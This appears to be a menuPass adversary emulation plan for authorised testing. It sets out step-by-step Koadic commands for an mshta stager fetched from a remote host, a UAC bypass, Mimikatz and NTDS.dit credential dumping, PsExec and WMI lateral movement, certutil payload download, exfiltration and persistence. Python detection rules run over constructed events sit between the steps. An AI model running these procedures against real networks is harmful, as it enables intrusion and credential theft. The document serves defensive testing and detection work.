Scenario 2 is designed to emulate activity attributed to menuPass that entails the pursuit of tactical objectives using a command-and-control framework with the operational intent of data exfiltration. Initial access could be achieved with either spearphishing or an assumed breach in which the emulation team is granted access to a host. The scenario will begin when execution is achieved, and command and control is established. This scenario differs from Scenario 1 in that instead of uploading an operational toolkit to the victim environment, it employs tactical and sustained malware to execute the subsequent procedures. In emulating this scenario, you will be assessing your organization's ability to protect, detect, and defend execution, command and control, lateral movement, persistence, and exfiltration.
- Emulating menuPass using tools like Koadic C3 and QuasarRat.
- Scenario 2 begins after a host is compromised, tactical malware has been deployed, and C2 is established.
- Your objectives in Phase 2 are to conduct discovery, escalate privileges, harvest credentials, move laterally, choose specific systems on which to persist sustained malware (optional), collect, stage, and exfiltrate real or simulated data.
There are many alternatives to the procedures detailed in this scenario. What is most important is that these procedures have been accomplished, not necessarily how they have been accomplished. If you lack the resources to complete this scenario procedure-by-procedure, feel free to "white card" or simulate where necessary.
- You have either ownership of, or explicit authority and/or authorization to operate against the target network.
- You have established your operational infrastructure.
- You have selected and installed your tactical implant/command-and-control framework.
- If you intend to deploy and persist sustained malware, you have identified and compiled your implant.
- Step 1 - Initial Access
- Step 2 - Execution
- Step 3 - Discovery
- Step 4 - Privilege Escalation
- Step 5 - Credential Access
- Step 6 - Lateral Movement
- Step 7 - Exfiltration
- Step 8 - Command and Control
- Step 9 - Persistence
Aside from trusted relationship abuse, menuPass is perhaps best known for efforts to achieve initial access to target networks by deploying phishing emails. These phishing emails deployed tactical malware by one of the four previously discussed methods (macro, .lnk, exploit, masquerading). menuPass has leveraged this initial access to conduct discovery, pursue credential access, and identify systems of interest on which to deploy and persist sustained malware.
2.A - User Execution: Malicious File (T1204.002)
menuPass is reported to have employed LNK files to achieve user execution. These LNK files utilized scripting languages to invoke the Windows command line and then download and execute tactical implants.16
MSHTA was used to accomplish execution and situate the tactical implant, Koadic, in memory. This tactical implant was used to conduct discovery, credential access, and lateral movement.
Attacker
./koadic
koadic: use stager/js/mshta
(koadic: sta/js/mshta)# set SRVHOST #{ip_address}
(koadic: sta/js/mshta)# set SRVPORT #{listening_port}
(koadic: sta/js/mshta)# run
[>] mshta http://#{ip_address}/#{file_name}
Target
C:\Users\Victim> mshta http://#{ip_address}/#{file_name}
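From the defender's side, the stager above leaves one durable signal: a script host (mshta.exe) started with content pulled from a remote source. The following detection, an added example that is not part of this emulation plan or of Koadic, runs over constructed process-creation events (field names modelled on Sysmon Event ID 1 / Windows 4688 and chosen here as an assumption) and flags mshta launches whose argument is a URL or UNC path outside an approved allow-list. The same shape of rule generalises to the other native download-and-execute procedure in this plan, the certutil -urlcache transfer in Step 8, by swapping the image name.

```python
"""Detect mshta.exe launched with content fetched from a remote source, the
behaviour of the stager/js/mshta procedure.  Added example: the events below
are constructed and only mimic Sysmon Event ID 1 / Windows 4688 fields."""
import re
from typing import Dict, List, Optional, Tuple

# http(s)/ftp URLs and UNC paths appearing anywhere in a command line.
REMOTE_SOURCE = re.compile(r"(?i)\b(?:https?|ftp)://[^\s\"']+|\\\\[^\s\"']+\\[^\s\"']+")
MSHTA = re.compile(r"(?i)\bmshta(?:\.exe)?\b")
# Constructed allow-list: origins an organisation has sanctioned for HTA delivery.
APPROVED_ORIGINS = ("intranet.corp.example",)

SAMPLE_EVENTS: List[Dict[str, str]] = [  # constructed, not real telemetry
    {"id": "e1", "host": "WS01", "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "mshta http://203.0.113.10:9999/Sxq2v"},          # stager pull (TEST-NET-3 address)
    {"id": "e2", "host": "WS01", "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'mshta.exe "C:\Program Files\Vendor\help.hta"'},  # local HTA, benign
    {"id": "e3", "host": "WS02", "image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "cmd /c mshta.exe https://intranet.corp.example/updater.hta"},  # approved origin
    {"id": "e4", "host": "WS03", "image": r"C:\Windows\SysWOW64\mshta.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"mshta \\fs01\public\notes.hta"},                 # UNC source
]


def mshta_remote_source(cmdline: str) -> Optional[str]:
    """Return the remote source an mshta command line references, else None."""
    if not MSHTA.search(cmdline):
        return None
    m = REMOTE_SOURCE.search(cmdline)
    return m.group(0) if m else None


def is_approved(source: str) -> bool:
    return any(origin in source.lower() for origin in APPROVED_ORIGINS)


def detect_mshta_stager(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (event id, source) for every mshta launch that pulls content from a
    remote, non-approved origin.  The match is on behaviour (script host plus
    remote source), not on the stager path, which is not stable across sessions."""
    hits = []
    for ev in events:
        src = mshta_remote_source(ev["cmdline"])
        if src and not is_approved(src):
            hits.append((ev["id"], src))
    return hits


if __name__ == "__main__":
    for event_id, source in detect_mshta_stager(SAMPLE_EVENTS):
        print(f"ALERT {event_id}: mshta loaded remote content from {source}")
```

The rule depends on command-line capture being enabled (Sysmon, or 4688 with "Include command line in process creation events"); without it only the image name is visible and the local-versus-remote distinction is lost. The allow-list is where false positives from legitimate intranet HTAs are absorbed.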
In some instances, soon after establishing C2, menuPass is reported to have introduced an additional implant to enhance operational capabilities.15 16 They did so by using Koadic to inject arbitrary shellcode into a process. Excel must be present on the host to use this procedure.
(koadic: sta/js/mshta)# use implant/inject/shellcode_excel
(koadic: implant/inj/shellcode_excel)# set shellcode #{ASCIIhex_shellcode}
(koadic: implant/inj/shellcode_excel)# set zombie #{zombie_id}
(koadic: implant/inj/shellcode_excel)# run
After achieving initial execution, menuPass actors are reported to have performed cursory situational awareness checks. These checks are intended to determine suitability for implantation with a sustained implant.16
3.A - System Network Configuration Discovery (T1016), System Network Connections Discovery (T1049) 16
Attacker
(koadic: sta/js/mshta)# zombies
(koadic: sta/js/mshta)# cmdshell #{zombie_id}
C:\Users\Victim> ipconfig /all
C:\Users\Victim> tasklist /v
C:\Users\Victim> net view
C:\Users\Victim> netstat -ano
(koadic: sta/js/mshta)# use implant/scan/tcp
(koadic: imp/sca/tcp)# set rhosts #{remote_hosts}
(koadic: imp/sca/tcp)# set rports #{ports_to_scan}
(koadic: imp/sca/tcp)# set zombies #{zombie_id}
(koadic: imp/sca/tcp)# run
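Each command in the discovery step above is routine on its own; the signal is several of them issued in quick succession from one parent process. The detection below is an added example (not part of the emulation plan) that groups constructed process-creation events by host and parent PID and raises one finding when at least three distinct discovery binaries run inside a two-minute window. Field names follow Sysmon Event ID 1 loosely and are an assumption.

```python
"""Flag a burst of discovery commands from a single parent process, the
situational-awareness pattern of Step 3 (ipconfig /all, tasklist /v,
net view, netstat -ano).  Added example over constructed events."""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# Individually unremarkable binaries that become telling when run together.
DISCOVERY_IMAGES = {"ipconfig.exe", "tasklist.exe", "net.exe", "net1.exe",
                    "netstat.exe", "whoami.exe", "systeminfo.exe", "nltest.exe"}

SAMPLE_EVENTS: List[Dict] = [  # constructed: one burst on WS01, routine use on WS02
    {"time": "2024-03-01T10:00:01", "host": "WS01", "parent_pid": 4120, "image": "ipconfig.exe", "cmdline": "ipconfig /all"},
    {"time": "2024-03-01T10:00:05", "host": "WS01", "parent_pid": 4120, "image": "tasklist.exe", "cmdline": "tasklist /v"},
    {"time": "2024-03-01T10:00:09", "host": "WS01", "parent_pid": 4120, "image": "net.exe", "cmdline": "net view"},
    {"time": "2024-03-01T10:00:14", "host": "WS01", "parent_pid": 4120, "image": "netstat.exe", "cmdline": "netstat -ano"},
    {"time": "2024-03-01T10:00:20", "host": "WS01", "parent_pid": 4120, "image": "notepad.exe", "cmdline": "notepad"},
    {"time": "2024-03-01T11:00:00", "host": "WS02", "parent_pid": 880, "image": "ipconfig.exe", "cmdline": "ipconfig"},
    {"time": "2024-03-01T11:30:00", "host": "WS02", "parent_pid": 880, "image": "netstat.exe", "cmdline": "netstat -an"},
]


def discovery_bursts(events: List[Dict], window_seconds: int = 120,
                     min_distinct: int = 3) -> List[Dict]:
    """Return one finding per (host, parent process) that ran at least
    `min_distinct` different discovery binaries within `window_seconds`."""
    by_parent = defaultdict(list)
    for ev in events:
        image = ev["image"].lower()
        if image in DISCOVERY_IMAGES:
            by_parent[(ev["host"], ev["parent_pid"])].append(
                (datetime.fromisoformat(ev["time"]), image))

    window = timedelta(seconds=window_seconds)
    findings = []
    for (host, ppid), runs in by_parent.items():
        runs.sort()
        for i, (start, _) in enumerate(runs):
            # Distinct discovery binaries seen in the window opening at `start`.
            seen = {name for t, name in runs[i:] if t - start <= window}
            if len(seen) >= min_distinct:
                findings.append({"host": host, "parent_pid": ppid,
                                 "start": start.isoformat(),
                                 "commands": sorted(seen)})
                break  # one finding per parent is enough for triage
    return findings


if __name__ == "__main__":
    for f in discovery_bursts(SAMPLE_EVENTS):
        print(f"ALERT {f['host']} ppid={f['parent_pid']} ran "
              f"{', '.join(f['commands'])} starting {f['start']}")
```

Tune `min_distinct` and the window against help-desk and admin baselines before enabling. When the commands come through Koadic's cmdshell, the parent chain itself (a script host such as mshta.exe above the shell) is a second signal worth joining to this one.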
In Scenario 1, menuPass is presumed to have initially accessed the target environment using compromised credentials that granted elevated privileges. As such, privilege escalation was not necessary. menuPass is reported to have sought access to additional credentials to ensure freedom of movement throughout the domain. This elevated access was a result of the method of initial access.
Scenario 2 differs in this regard because the initial method of access is presumed to be phishing, which does not always result in elevated access. Elevation of process integrity is therefore required before the tools that grant additional credential access can be used. We suggest either "white carding" Administrative access or leveraging Koadic's "elevate" modules to attempt escalation.
(koadic: sta/js/mshta)# use implant/elevate/bypassuac_eventvwr
(koadic: implant/ele/bypassuac_eventvwr)# set payload #{payload_id}
(koadic: implant/ele/bypassuac_eventvwr)# set zombie #{zombie_id}
(koadic: implant/ele/bypassuac_eventvwr)# run
Check Privileges
(koadic: implant/ele/bypassuac_eventvwr)# zombies #{zombie_id}
(koadic: sta/js/mshta)# use implant/inject/mimikatz_dotnet2js
(koadic: imp/inj/mimikatz_dotnet2js)# set mimicmd #{mimikatz_command}
(koadic: imp/inj/mimikatz_dotnet2js)# set zombie #{zombie_id}
(koadic: imp/inj/mimikatz_dotnet2js)# run
5.B - OS Credential Dumping: NTDS (T1003.003)
menuPass is reported to have sought access to additional credentials to ensure freedom of movement throughout the domain.
(koadic: sta/js/mshta)# use implant/gather/hashdump_dc
(koadic: imp/gat/hashdump_dc)# set lpath #{local_file_path}
(koadic: imp/gat/hashdump_dc)# set drive #{drive_to_shadow_copy}
(koadic: imp/gat/hashdump_dc)# set rpath #{remote_file_save_path}
(koadic: imp/gat/hashdump_dc)# set certutil true
(koadic: imp/gat/hashdump_dc)# set zombie #{zombie_id}
(koadic: imp/gat/hashdump_dc)# run
Ntdsutil 32
This procedure leverages a tool commonly featured on Windows Server, ntdsutil.exe, to create an Install From Media (IFM) copy of the Active Directory database (NTDS.dit) together with the SYSTEM and SECURITY registry hives from the domain controller. These files will be copied to a specified directory and must be egressed from the network in order to dump credentials locally. This procedure requires Administrative privileges and access to the domain controller but does not require credentials to be supplied.
Ntdsutil.exe must be present on the host.
(koadic: sta/js/mshta)# cmdshell #{zombie_id}
C:\Users\Victim> powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full C:\ProgramData\Temp' q q"
Download the file
(koadic: sta/js/mshta)# use implant/utils/download_file
(koadic: imp/uti/download_file)# set lpath #{local_file_save_path}
(koadic: imp/uti/download_file)# set rfile #{file_to_download}
(koadic: imp/uti/download_file)# set certutil true
(koadic: imp/uti/download_file)# set zombie #{zombie_id}
(koadic: imp/uti/download_file)# run
After copying and exfiltrating the NTDS.dit file and the SYSTEM and SECURITY hives, you will use Impacket's secretsdump to dump credentials locally.
secretsdump.exe -system #{system_hive_local_path\SYSTEM} -security #{security_hive_local_path\SECURITY} -ntds #{ntds_local_path\ntds.dit} local
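Because secretsdump runs on the operator's machine, the only on-host evidence of 5.B is the ntdsutil command line and the files it writes. The detection below is an added example, not part of the emulation plan, over constructed events modelled on Sysmon Event ID 1 (process creation) and Event ID 11 (file creation); field names are an assumption. It flags the IFM export verbs, any NTDS.dit written outside the database directory, and hive copies written by ntdsutil.

```python
"""Detect the ntdsutil IFM export of Step 5.B from host telemetry.  Added
example with constructed events; secretsdump itself runs off-host, so the
signals are the command line and the copies of NTDS.dit and the hives."""
import re
from typing import Dict, List, Tuple

# "ac i ntds" "ifm" "create full <dir>" is the export; other ntdsutil verbs are routine DC administration.
NTDSUTIL_IFM = re.compile(r"(?i)\bntdsutil\b.*\b(?:ifm|create\s+full)\b")
# IFM writes the hives as <dir>\registry\SYSTEM and <dir>\registry\SECURITY.
IFM_HIVE_COPY = re.compile(r"(?i)\\registry\\(?:system|security)$")

SAMPLE_EVENTS: List[Dict[str, str]] = [  # constructed
    {"id": "p1", "type": "process", "host": "DC01",
     "image": r"C:\Windows\System32\ntdsutil.exe",
     "cmdline": r'ntdsutil.exe "ac i ntds" "ifm" "create full C:\ProgramData\Temp" q q'},
    {"id": "f1", "type": "file", "host": "DC01",
     "image": r"C:\Windows\System32\ntdsutil.exe",
     "path": r"C:\ProgramData\Temp\Active Directory\ntds.dit"},
    {"id": "f2", "type": "file", "host": "DC01",
     "image": r"C:\Windows\System32\ntdsutil.exe",
     "path": r"C:\ProgramData\Temp\registry\SYSTEM"},
    {"id": "p2", "type": "process", "host": "DC01",
     "image": r"C:\Windows\System32\ntdsutil.exe",
     "cmdline": r'ntdsutil.exe "snapshot" "list all" q q'},  # routine administration
    {"id": "f3", "type": "file", "host": "DC01",
     "image": r"C:\Windows\System32\lsass.exe",
     "path": r"C:\Windows\NTDS\ntds.dit"},  # the live database, expected
]


def detect_ntds_export(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (rule, event id) pairs for IFM exports and out-of-place database copies."""
    findings = []
    for ev in events:
        if ev["type"] == "process":
            if NTDSUTIL_IFM.search(ev["cmdline"]):
                findings.append(("ntdsutil_ifm_export", ev["id"]))
        elif ev["type"] == "file":
            path = ev["path"].lower()
            writer = ev["image"].lower()
            # NTDS.dit belongs only under %SystemRoot%\NTDS (or the configured DB path).
            if path.endswith("\\ntds.dit") and "\\windows\\ntds\\" not in path:
                findings.append(("ntds_dit_outside_db_dir", ev["id"]))
            elif IFM_HIVE_COPY.search(path) and writer.endswith("\\ntdsutil.exe"):
                findings.append(("ifm_registry_hive_copy", ev["id"]))
    return findings


if __name__ == "__main__":
    for rule, event_id in detect_ntds_export(SAMPLE_EVENTS):
        print(f"ALERT {rule}: event {event_id}")
```

IFM media is also created legitimately when provisioning new domain controllers, so route hits through change control rather than suppressing them; the subsequent download_file step, which moves the export off the DC, is a second opportunity to catch the same activity.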
6.A - Windows Management Instrumentation (T1047)
(koadic: sta/js/mshta)# use implant/pivot/stage_wmi
(koadic: implant/piv/stage_wmi)# set rhost #{remote_host}
(koadic: implant/piv/stage_wmi)# set smbuser #{user_name}
(koadic: implant/piv/stage_wmi)# set smbpass #{password}
(koadic: implant/piv/stage_wmi)# set smbdomain #{domain}
(koadic: implant/piv/stage_wmi)# set payload #{payload_id}
(koadic: implant/piv/stage_wmi)# set zombie #{zombie_id}
(koadic: implant/piv/stage_wmi)# run
System Services: Service Execution (T1569.002)
Upload PsExec to the host
(koadic: sta/js/mshta)# use implant/utils/upload_file
(koadic: imp/uti/upload_file)# set lfile #{local_file_to_upload}
(koadic: imp/uti/upload_file)# set zombie #{zombie_id}
(koadic: imp/uti/upload_file)# run
PsExec to remote host
(koadic: sta/js/mshta)# use implant/pivot/exec_psexec
(koadic: implant/piv/exec_psexec)# set cmd #{command_to_run}
(koadic: implant/piv/exec_psexec)# set rhost #{remote_host}
(koadic: implant/piv/exec_psexec)# set smbuser #{user_name}
(koadic: implant/piv/exec_psexec)# set smbpass #{password}
(koadic: implant/piv/exec_psexec)# set credid #{credential_id}
(koadic: implant/piv/exec_psexec)# set rpath #{remote_path_to_psexec}
(koadic: implant/piv/exec_psexec)# set zombie #{zombie_id}
(koadic: implant/piv/exec_psexec)# run
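Both lateral-movement procedures in Step 6 are visible on the target host: stage_wmi results in a shell or script host whose parent is the WMI provider host (WmiPrvSE.exe), and exec_psexec leaves the PSEXESVC service installation behind. The detection below is an added example, not part of the emulation plan, over constructed events modelled on Sysmon Event ID 1, Security 4624 and System 7045 (field names are an assumption); it also attaches the most recent network logon on the host so the analyst knows which account and source address to pivot on.

```python
"""Detect the Step 6 lateral-movement procedures from the target side: a
process spawned by WmiPrvSE.exe (stage_wmi) and the PSEXESVC service
install left by PsExec (exec_psexec).  Added example over constructed events."""
from typing import Dict, List, Optional, Tuple

WMI_PROVIDER_HOST = "wmiprvse.exe"
SCRIPT_AND_SHELL_HOSTS = {"cmd.exe", "powershell.exe", "mshta.exe", "rundll32.exe",
                          "regsvr32.exe", "wscript.exe", "cscript.exe"}

SAMPLE_EVENTS: List[Dict] = [  # constructed; 10.0.5.21 stands in for the first compromised host
    {"id": "l1", "type": "logon", "host": "WS05", "logon_type": 3,
     "user": "CORP\\svc_backup", "source_ip": "10.0.5.21"},
    {"id": "s1", "type": "process", "host": "WS05",
     "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c mshta http://203.0.113.10:9999/Sxq2v"},
    {"id": "l2", "type": "logon", "host": "FS01", "logon_type": 3,
     "user": "CORP\\svc_backup", "source_ip": "10.0.5.21"},
    {"id": "s2", "type": "service", "host": "FS01", "service_name": "PSEXESVC",
     "image_path": r"%SystemRoot%\PSEXESVC.exe", "account": "LocalSystem"},
    {"id": "s3", "type": "service", "host": "FS01", "service_name": "VendorUpdateSvc",
     "image_path": r"C:\Program Files\Vendor\svc.exe", "account": "LocalSystem"},
    {"id": "s4", "type": "process", "host": "WS06", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe"},
]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_lateral_movement(events: List[Dict]) -> List[Tuple[str, str, str, Optional[str]]]:
    """Return (rule, host, event id, last network logon on that host) per hit.
    The logon is the most recent type-3 logon seen before the event."""
    last_net_logon: Dict[str, str] = {}
    findings = []
    for ev in events:
        host = ev["host"]
        if ev["type"] == "logon":
            if ev["logon_type"] == 3:
                last_net_logon[host] = f"{ev['user']} from {ev['source_ip']}"
        elif ev["type"] == "process":
            if (basename(ev["parent"]) == WMI_PROVIDER_HOST
                    and basename(ev["image"]) in SCRIPT_AND_SHELL_HOSTS):
                findings.append(("wmi_remote_process", host, ev["id"],
                                 last_net_logon.get(host)))
        elif ev["type"] == "service":
            blob = (ev["service_name"] + " " + ev["image_path"]).lower()
            if "psexesvc" in blob:
                findings.append(("psexec_service_install", host, ev["id"],
                                 last_net_logon.get(host)))
    return findings


if __name__ == "__main__":
    for rule, host, event_id, logon in detect_lateral_movement(SAMPLE_EVENTS):
        print(f"ALERT {rule} on {host} (event {event_id}); last network logon: {logon}")
```

The PSEXESVC match is the narrow form; PsExec can install under another service name, so pair it with a broader rule on any new service created shortly after a network logon from an unexpected source. Both rules assume System and Security event forwarding from workstations and servers, not only from domain controllers.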
7.A - Exfiltration Over C2 Channel (T1041)
(koadic: sta/js/mshta)# use implant/utils/download_file
(koadic: imp/uti/download_file)# set lpath #{local_file_save_path}
(koadic: imp/uti/download_file)# set rfile #{file_to_download}
(koadic: imp/uti/download_file)# set certutil true
(koadic: imp/uti/download_file)# set zombie #{zombie_id}
(koadic: imp/uti/download_file)# run
menuPass actors are reported to have introduced sustained malware to target networks. Poison Ivy, PlugX, and more recently, the publicly available QuasarRat are reported to have been used by menuPass actors.4 11 13 25 These implants provide the attacker with additional capabilities. More importantly, these implants are used to ensure persistent access to the target network.
menuPass actors are reported to have conducted ingress tool transfer using several different techniques. You may choose to use Koadic's built-in functionality or leverage tools native to the Windows environment. menuPass actors are reported to have done both.15 16
8.A - Ingress Tool Transfer (T1105)
menuPass may have accessed the command line to use a tool native to the Windows environment (certutil) to download and decode additional capabilities.16
(koadic: sta/js/mshta)# cmdshell #{zombie_id}
C:\Users\Victim> certutil.exe -urlcache -split -f https://www.#{payload_server.com}/#{file}
(koadic: sta/js/mshta)# use implant/utils/upload_file
(koadic: imp/uti/upload_file)# set lfile #{local_file_to_upload}
(koadic: imp/uti/upload_file)# set zombie #{zombie_id}
(koadic: imp/uti/upload_file)# run
menuPass actors are reported to have persisted both tactical and sustained malware.4 5 11 25 Tactical malware should be thought of as the "workhorse." It is the tool used to accomplish tactical objectives and is therefore more likely to be detected. menuPass is reported to have been deliberate in the deployment and persistence of sustained malware. These implants were employed to facilitate long-term access to target environments.11 Sustained malware was deployed to systems that afforded the ability to blend in, remain undetected, or facilitate access to a resource deemed essential. Select your host for persistence carefully, and do not persist tactical and sustained implants on the same host.
9.A - Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder (T1547.001)
Tactical Malware
(koadic: sta/js/mshta)# use implant/persist/registry
(koadic: imp/per/registry)# set payload #{payload_id}
(koadic: imp/per/registry)# set zombie #{zombie_id}
(koadic: imp/per/registry)# run
Alternative Procedure: Scheduled Task/Job: Scheduled Task (T1053.005)
Tactical Malware
(koadic: sta/js/mshta)# use implant/persist/schtasks
(koadic: imp/per/schtasks)# set payload #{payload_id}
(koadic: imp/per/schtasks)# set zombie #{zombie_id}
(koadic: imp/per/schtasks)# run
Sustained Malware
menuPass actors are reported to have persisted implants using several different procedures, including creating scheduled tasks, registry keys, and Windows services, and dropping LNK files in the Startup folder.4 5 11 25 If you choose to use QuasarRAT as your sustained implant, you may either select "Run Client when the computer starts" from the Client Builder menu when generating your implant or do so using the Windows command line. QuasarRAT creates a registry run key and schedules a task in order to establish persistence.
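The persistence procedures of Step 9 share two detectable traits: the autostart target lives in a user-writable directory (sustained implants) or re-launches a script host against a URL (Koadic's persist/registry and persist/schtasks re-stage the tactical implant), and QuasarRAT installs a Run key and a scheduled task together. The detection below is an added example, not part of the emulation plan, over constructed events modelled on Sysmon Event ID 13 (registry value set) and Security 4698 (scheduled task created); field names and the sample paths are assumptions, and the paired rule assumes both entries point at the same executable.

```python
"""Detect the Step 9 persistence mechanisms: Run keys and scheduled tasks
whose target is suspicious, and the Run-key-plus-task pairing of QuasarRAT.
Added example over constructed events."""
import re
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

RUN_KEY = re.compile(r"(?i)\\software\\microsoft\\windows\\currentversion\\run(?:once)?\\")
# Executables launched from user-writable locations are the common thread of both implant types.
USER_WRITABLE = re.compile(r"(?i)\\(?:appdata|temp|programdata|users\\public|downloads)\\")
# A value that re-launches a script host against a URL re-stages tactical malware.
REMOTE_SCRIPT_HOST = re.compile(r"(?i)\b(?:mshta|rundll32|regsvr32|wscript|cscript|powershell)\b.*https?://")

SAMPLE_EVENTS: List[Dict[str, str]] = [  # constructed
    {"id": "r1", "type": "registry", "host": "WS07", "time": "2024-03-01T14:02:10",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "value": r"C:\Users\victim\AppData\Roaming\Updater\updater.exe"},
    {"id": "t1", "type": "task", "host": "WS07", "time": "2024-03-01T14:02:11",
     "task": r"\Updater",
     "action": r"C:\Users\victim\AppData\Roaming\Updater\updater.exe"},
    {"id": "r2", "type": "registry", "host": "WS08", "time": "2024-03-01T09:15:00",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "value": r"C:\Program Files\Microsoft OneDrive\OneDrive.exe /background"},  # benign
    {"id": "t2", "type": "task", "host": "WS09", "time": "2024-03-01T11:00:00",
     "task": r"\Microsoft\Windows\Defrag\ScheduledDefrag",
     "action": r"%windir%\system32\defrag.exe -c -h -k -g"},  # benign
    {"id": "r3", "type": "registry", "host": "WS10", "time": "2024-03-01T16:40:00",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Sync",
     "value": "mshta http://203.0.113.10:9999/Sxq2v"},  # tactical implant re-staged
]


def suspicious_autostarts(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Autostart entries whose target lives in a user-writable directory or
    re-stages a script host from a URL."""
    out = []
    for ev in events:
        if ev["type"] == "registry" and RUN_KEY.search(ev["key"]):
            target = ev["value"]
        elif ev["type"] == "task":
            target = ev["action"]
        else:
            continue
        if USER_WRITABLE.search(target) or REMOTE_SCRIPT_HOST.search(target):
            out.append(ev)
    return out


def paired_persistence(events: List[Dict[str, str]], window_seconds: int = 300) -> List[Tuple[str, str, str]]:
    """Hosts where a suspicious Run key and a suspicious scheduled task point
    at the same executable within the window (QuasarRAT sets both)."""
    sus = suspicious_autostarts(events)
    keys = [e for e in sus if e["type"] == "registry"]
    tasks = [e for e in sus if e["type"] == "task"]
    window = timedelta(seconds=window_seconds)
    pairs = []
    for k in keys:
        for t in tasks:
            same_host = k["host"] == t["host"]
            same_target = k["value"].lower() == t["action"].lower()
            close = abs(datetime.fromisoformat(k["time"])
                        - datetime.fromisoformat(t["time"])) <= window
            if same_host and same_target and close:
                pairs.append((k["host"], k["id"], t["id"]))
    return pairs


if __name__ == "__main__":
    for ev in suspicious_autostarts(SAMPLE_EVENTS):
        print(f"ALERT autostart {ev['id']} on {ev['host']}")
    for host, key_id, task_id in paired_persistence(SAMPLE_EVENTS):
        print(f"ALERT paired persistence on {host}: run key {key_id} + task {task_id}")
```

Sysmon only records Run-key writes if its configuration includes the CurrentVersion\Run targets, and 4698 requires the "Audit Other Object Access Events" subcategory; verify both on the hosts selected for sustained-implant persistence before relying on this rule.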